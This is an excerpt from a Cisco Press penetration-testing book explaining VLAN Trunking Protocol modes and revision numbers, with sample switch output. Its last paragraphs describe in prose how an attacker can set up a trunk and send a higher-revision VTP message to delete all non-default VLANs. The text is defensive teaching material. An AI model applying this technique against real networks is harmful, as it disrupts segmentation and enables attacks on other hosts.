The VLAN Trunking Protocol (VTP) is a management protocol that reduces the amount of configuration in a switched environment. With VTP, a switch can be a VTP Server, VTP Client, or VTP Transparent switch. VTP Transparent switches do not participate in VTP, so the discussion here focuses on Server and Client. Using VTP, you can configure all your VLAN declarations on a switch operating in VTP Server mode. Any time you make a change, whether it is the addition, modification, or removal of a VLAN, the VTP configuration revision number increments by one. When VTP Clients see that the configuration revision number is greater than what they currently have, they know to synchronize with the VTP Server. The example below shows the output of the show vtp status command, which illustrates both the configuration revision number and the VTP mode of a switch.
Cat2950#show vtp status VTP Version : 2 Configuration Revision : 4 Maximum VLANs supported locally : 68 Number of existing VLANs : 6 VTP Operating Mode : Server VTP Domain Name : HackMyNetwork VTP Pruning Mode : Enabled VTP V2 Mode : Disabled VTP Traps Generation : Disabled MD5 digest : 0x3D 0x02 0xD4 0x3A 0xC4 0x46 0xA1 0x03 Configuration last modified by 10.1.1.40 at 5-4-02 22:25:
A malicious hacker can use VTP to his advantage to remove all VLANs (except the default VLANs) on a network. This allows the malicious hacker to be on the same VLAN as every other user. The users might still be on separate networks, however, so the malicious hacker would need to change his IP address to be on the same network as the host he wants to attack.
A malicious hacker exploits VTP to his advantage by connecting into a switch and establishing a trunk between his computer and the switch. (See the earlier VLAN Hopping section for more on establishing a trunk.) A malicious hacker then sends a VTP message to the switch with a higher configuration revision number than the current VTP Server but with no VLANs configured. This causes all switches to synchronize with the computer of the malicious hacker, which removes all nondefault VLANs from their VLAN database.From Penetration Testing and Network Defense, by Andrew Whitaker and Daniel Newman. Chapter 10, pp. 333-337 - Cisco Press. Reprinted with permission.
This article was first published on EnterpriseITPlanet.com.